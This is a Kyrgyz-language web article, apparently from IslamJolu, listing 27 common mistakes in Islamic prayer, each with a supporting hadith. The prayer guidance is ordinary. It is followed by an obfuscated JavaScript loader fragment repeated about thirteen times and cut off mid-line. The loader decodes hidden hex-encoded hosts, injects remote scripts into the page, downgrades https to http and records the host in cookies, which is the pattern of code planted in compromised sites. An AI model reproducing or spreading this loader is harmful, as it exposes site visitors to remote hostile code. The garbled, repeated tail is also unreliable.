Намаздагы эң көп таркалган 27 ката

 1. Коомат айтылган учурда парз намаздан башка намаз окуу

Абу Хурейра (Аллах андан ыраазы болсун)  риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам)  айтты: “Коомат айтылган учурда парз намаздан башка намаз жок” (Муслим)

2 .Намаз учурунда асманды кароо

Анас Ибн Малик (Аллах ага ыраазы болсун)  риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “ Адамдар намазда туруп асманды караганды токтотушсун , же болбосо чындыгында, көрүүсүнөн ажырап калышат”   (Аль Бухари)

 

3.Намазга кириш үчүн такбир айтканда  эки колду көтөрбөө

Абдуллах Ибн Умар (алардан Аллах ыраазы болсун)  айтты: “Аллахтын элчиси (соллаАллаху алейхи уа саллам) намазды баштаганда эки колун ийинине чейин көтөргөнүн жана рукуга бараарда дал ошондой эле кылганын көрдүм (Аль- Бухари).

 

4. Намаз учурунда эки жакты кароо

Аиша (Аллах андан ырааза болсун)  айтты: “Күндөрдүн биринде, Аллахтын элчисине намаз учурунда эки жакты кароо жөнүндө  суроо бердим, ал (соллаАллаху алейхи уа саллам)   айтты: “Бул — шайтандын уурдаганы, ушундай кылып шайтан, пенденин намазынан уурдайт”. (Аль — Бухари)

 

5. Намазда кыям абалында туруп, колду байлабай коюу

Сахл Ибн Са’д (Аллах андан ыраазы болсун) айтты: “Адамдарга намаз учурунда оң  колду сол билегинин үстүнө  коюуга  буйрук берилген”. (Аль- Бухари)

 

6. Намазды шашып  жана  тынчсызданып окуу

Абу Катада (Аллах андан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Уурулардын эң  жаманы, бул – өзүнүн намазынан уурдагандар”. Элдер сурашты: “О, Аллахтын элчиси, адам өзүнүн намазынан кантип уурдашы мүмкүн?” Ал жооп берди: “Рукусун жана саждасын толук аткарбоосу” (Имам Ахмад. Шейх Альбани бул хадисти сахих деп тастыкташкан)

 

7. Сажда кылууда кадамды жерден өйдө  көтөрүү

Абдулла Ибн Аббас (Аллах алардан ыраазы болсун)  риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам)  айтты: “Жети дененин мүчөсү  менен таянып сажда кылууга буйрулганмын. Алар: чеке (деп айтуу менен  мурунун  көргөздү) , эки алакан, эки тизе жана эки буттун  манжалары (Аль- Бухари)

 

8. Саждада мурунду жерге тийгизбөө

Абдулла Ибн Аббас (Аллах алардан ыраазы болсун)  риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Жети дененин мүчөсү  менен таянып сажда кылууга буйрулганмын. Алар: чеке (деп айтуу менен  мурунун көргөздү) , эки алакан, эки тизе жана эки буттун манжалары (Аль- Бухари)

 

 9. Намазда имамдан оозуп кетүү  же кыймылдарды аны менен тең  аткаруу

Анас (Аллах андан ыраазы болсун)  айтты: “Күндөрдүн биринде Аллахтын элчиси (соллаАллаху алейхи уа саллам) биз менен чогуу намаз окуду. Намаз окуп буткөн соң, бизге кайрылып:  “О, адамдар! Чындыгында мен силердин имамыңармын, андыктан рукуда, саждада, кыямда (турууда) жана намазды бүтүрөөрдө менден алдыга оозуп кетпегиле. Чындыгында, мен силерди алдыман жана артыман көрөмүн”(Муслим)

 

10. Сажда учурунда билекти жерге толугу менен төшөп коюу

Анас (Аллах андан ыраазы болсун)  риваят кылат, Пайгамбар  Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Сажда кылууда, белиңерди түздөгүлө  жана эч кимиңер ит сымал колун жерге төшөбөсүн” (Муслим)

 

11. Рекетке жетишип калуу үчүн шашылуу

Абу Хурайра (Аллах андан ыраазы болсун)  риваят кылат, Пайгамбарыбыз Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Эгер кооматты уксаңар, анда намазга тынч, шашылбай жана жүгүрбөй баргыла. Кайсыл жерине жетишсеңер ошол жерден улагыла, ал эми өткөрүп жиберген жерин толуктагыла”  (Аль- Бухари)

 

12. Сутрасы (тосмо) жок намаз окуу

Абу Саид Аль-Худри (Аллах андан ыраазы болсун)  риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Эгер намаз окусаңар, сутра (тосмо) коюп окугула жана ага жакын тургула. Эгер бирөө  арадан кесип өтөм десе, аны менен согушкула, анткени ал шайтан” (Ибн Хузейма. Шейх аль- Альбани бул хадисти сахих деп атаган)

 

13. Намазга кирүү үчүн имамды толук (кыямга)  туруусун күтүү

Абдуллах Ибн Мугаффар (Аллах андан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Эгер кимде ким мени руку, же кыям, же сажда абалында тапса, анда ал ошол жерден кошула берсин”. (Абдур Раззак, Ибн Хаджар бул хадисти сахих деп айтышкан)

 

14. Намаздын сөздөрүн башкаларга жолтоо болгудай кылып бийик үн менен айтуу

Абу Саид Аль-Худри (Аллах андан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: Чындыгында, ар бир адам намазында  өзүнүн Раббисине жашыруун дуа кылат, андыктан бириңерге-бириңер тоскоол болбогула. Ошондой эле Куран (же намаз) окуганда бири-бириңерден үнүңөрдү  көтөрбөгүлө(Абу Давуд, Шейх Альбани бул хадисти сахих деп айткан)

 

15. Рукудан турган соң  колду дуа кылгандай кылып көтөрүү

Абулла Ибн Умар (Аллах алардан ыраазы болсун) айтты: “Аллахтын элчиси (соллаАллаху алейхи уа саллам) намазды баштап жатып эки колун ийинине чейин көтөргөнүн көрдүм” (Аль Бухари)

 

16. Рукудан толук түзөлбөө

Абу Хурайра (Аллах андан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “… рукуңда дене мүчөлөрүң эс алгыдай руку кыл. Андан соң  рукудан толук түзөлгүчө кыямга тур” (Аль- Бухари)

 

 17. Рукуну туура эмес аткаруу

Аиша (Аллах андан ыраазы болсун) айтты: “Аллахтын элчиси (соллаАллаху алейхи уа саллам) рукуга барганда, башын өтө  ылдый түшүрбөстөн жана өтө өйдө  көтөрбөстөн, экөөнүн ортосунда кылчу” (Муслим)

 

 

18. Кийимди  түрүп алып намаз окуу

Абдулла Ибн Аббас (Аллах алардан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Жети дененин мүчөсү  менен таянып сажда кылууга буйрулганмын. Ошондой эле кийимди  жана чачты түрбөй окууга буйрулдум” (Аль- Бухари)

 

19. Ийинди жаппаган кийимде намаз окуу

Абу Хурейра (Аллах андан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Эч кимиңер ийинди  жаппаган жалгыз бир кийимде намаз окубагыла” (Аль- Бухари)

 

20. Алаксыткан буюм бар жердеги намаз

Анас Ибн Малик (Аллах андан ыраазы болсун) айткан, Аишанын (Аллах андан ыраазы болсун) жүндөн жасалган жука пардасы бар эле. Аны менен ал үйүнүн бир тарабын тосчу. Күндөрдүн биринде Пайгамбар (соллаАллаху алейхи уа саллам) ага айтты: “Пардаңды алып кой, себеби андагы сүрөт намаз окуганда мага тоскоол болуп жатат” (Аль- Бухари)

 

21. Намаз окуп жаткан адамдын алдынан өтүү

Абу Жухайм (Аллах андан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты:  “Намаз окуп  жаткан адамдын алдынан өткөн киши, кандай күнөөгө  дуушар болорун билгенде, анын алдынан өткөнчө, ал жерде «кырк» турганы жакшыраак болмок!” Бул хадистин риваятчыларынын бири Абу ан-Надр айткан: “Мен так эстей албайм, ал кырк күн, ай же жыл деп айтканын” (Муслим)

 

22. Жаамат- намазында, сапты толтурбай ачык орун калтыруу

Жабир ибн Самура (Аллах андан ыраазы болсун) айткан: “Аллахтын элчиси (соллаАллаху алейхи уа саллам) бизге чыгып айтты:  “Силер периштелер Раббисинин алдында сап-сап болуп тургандай турууну каалабайсыңарбы!?”. Биз сурадык: “Периштелер Раббилеринин алдында кандай турушат?”.  Ал айтты: “Алар биринчи катарларды толтурушуп, бири бирине жакын турушат” (Муслим)

 

23. Саждага бараарда жана кыямга турганда такбир менен кошо  эки колду көтөрүү

Абдуллах Ибн Умар (Аллах алардан ыраазы болсун) айтты: “Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) такбир айтып намазды баштаганда эки колун ийнине чейин көтөргөнүн жана такбир айтып эки колун көтөрүп рукуга барганын көрдүм. Рукудан туруп “Ким Аллахты мактаса, Аллах аны угат” жана “Баардык мактоолор биздин Раббибизге болсун” деп айтып эки колун көтөргөн. Бирок ал саждага барарда жана саждадан башын көтөргөндө  колдорун көтөргөн эмес. (Аль-Бухари)

 

24. Сажда кылууда алаканды жерге тийгизбөө

Абдулла Ибн Аббас (Аллах алардан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Жети дененин мүчөсү  менен таянып сажда кылууга буйрулганмын:  чеке (деп айтып мурунун көргөздү), эки алакан, эки тизе жана эки буттун манжалары” (Аль- Бухари)

 

25. Намазда куран жана дуа окуганда,эриндерди кыймылдатпоо

 Зейд Ибн Сабит (Аллах андан ыраазы болсун) айтты: “Пайгамбар (соллаАллаху алейхи уа саллам) пешим намазын узакка окуду, ал куран окуп жатып эриндерин кыймылдатып жатты” (Аль-Бухари)

 

26. Саптардын бирикпеши жана ийри болушу

Нуман Ибн Башир (Аллах андан ыраазы болсун) риваят кылат, Пайгамбар Мухаммад (соллаАллаху алейхи уа саллам) айтты: “Силер сабыңарды түздөгүлө, же болбосо Аллах араңарга келишпестик пайда кылат!” (Аль-Бухари)

 

27. Эки кадамдын ортосуна отуруу

Абу Хумейд Саиди (Аллах андан ыраазы болсун) Пайгамбардын (соллаАллаху алейхи уа саллам) намазын сүрөттөп жатып айтты: “Ал рекеттердин арасында сол бутуна отурган, ал эми оң  бутун (кадамын) тигинен койгон” (Аль- Бухари)

 

Даярдаган : © ИсламЖолу 

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var 